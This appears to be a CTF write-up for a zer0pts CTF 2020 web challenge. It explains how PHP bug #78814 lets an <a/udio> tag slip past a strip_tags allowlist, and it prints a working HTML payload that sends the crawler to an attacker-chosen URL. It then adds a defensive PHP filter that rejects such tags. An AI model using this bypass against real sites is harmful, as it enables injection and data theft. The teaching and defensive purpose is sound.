zer0pts CTF, zer0pts CTF 2020, web
We're given the source code for the database, the app, and the crawler. The location of the flag can easily be found in worker/worker.js.
The flag is in the User-Agent header. This means that you can get the flag if the crawler accesses a website you own. But how?
Hack the URL the crawler accesses? As you can see from new_post.php, you can't.
XSS? As you can see from post.php, it seems that you can't use HTML tags other than <audio>.
But you can. As you can see from the Dockerfile in web, the web server uses PHP 7.4.0. The latest version of PHP is now PHP 7.4.3, so it seems a bit old. Let's read the changelog for 7.4.0 → 7.4.1.
- Standard:
- Fixed bug #78814 (strip_tags allows / in tag name => whitelist bypass).
This app uses strip_tags to remove tags other than <audio>. Let's dig into the bug.
Bug #78814 strip_tags allows / in tag name, allowing whitelist bypass in browsers
When strip_tags is used with a whitelist of tags, php allows slashes ("/") that occur inside the name of a whitelisted tag and copies them to the result.
For example, if <strong> is whitelisted, then a tag <s/trong> is also kept.
This means that in the app's case, strip_tags allows <a/udio>, which the browser interprets as <a>.
So, with a payload like [["></audio><a/udio href="(URL)" id="like">test</a/udio><audio a="]], you can bring the crawler to any URL.
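Added example (not from the challenge's code or this write-up): a PHP post-filter that runs after strip_tags() and rejects any surviving tag whose raw name token contains a "/", which is exactly what this bypass depends on, so a post shaped like the payload above is refused on any PHP version. The allowlist of only <audio> and the placeholder URL are assumptions.

```php
<?php
// Added example, not part of the challenge or the write-up: a post-filter that
// catches the bug #78814 bypass no matter which PHP version runs strip_tags().
//
// A browser ends a tag name at whitespace, '/' or '>', so <a/udio href=...>
// renders as <a href=...>. strip_tags() before 7.4.1 kept the "a/udio" token
// because it still matched the whitelisted <audio> in its comparison.

const ALLOWED_TAGS = ['audio'];   // assumed allowlist, mirroring post.php

// Extracts the raw tag-name tokens left in $html (the text right after '<'
// or '</' up to the first whitespace or '>'), lowercased.
function raw_tag_names(string $html): array
{
    preg_match_all('/<\/?([^\s>]*)/', $html, $m);
    return array_map('strtolower', $m[1]);
}

// Returns the sanitized body, or null if any surviving tag is not exactly an
// allowed name. A '/' inside a name means the browser would see a different
// (shorter) tag than the one strip_tags() compared against: the bypass.
function sanitize_post(string $body): ?string
{
    $stripped = strip_tags($body, '<audio>');
    foreach (raw_tag_names($stripped) as $name) {
        if (strpos($name, '/') !== false) {
            return null;                  // e.g. "a/udio" survived strip_tags()
        }
        if (!in_array($name, ALLOWED_TAGS, true)) {
            return null;                  // defensive; strip_tags() should prevent this
        }
    }
    return $stripped;
}

// Constructed post body in the shape the write-up describes; the URL is a placeholder.
$post = '"></audio><a/udio href="https://example.invalid/" id="like">test</a/udio><audio a="';
$clean = sanitize_post($post);
echo $clean === null
    ? "rejected: a slashed tag name survived strip_tags()\n"
    : "accepted: " . $clean . "\n";
```

On PHP 7.4.0 the filter returns null because <a/udio> survives strip_tags(); on 7.4.1 and later strip_tags() already removes it and the stripped text is returned.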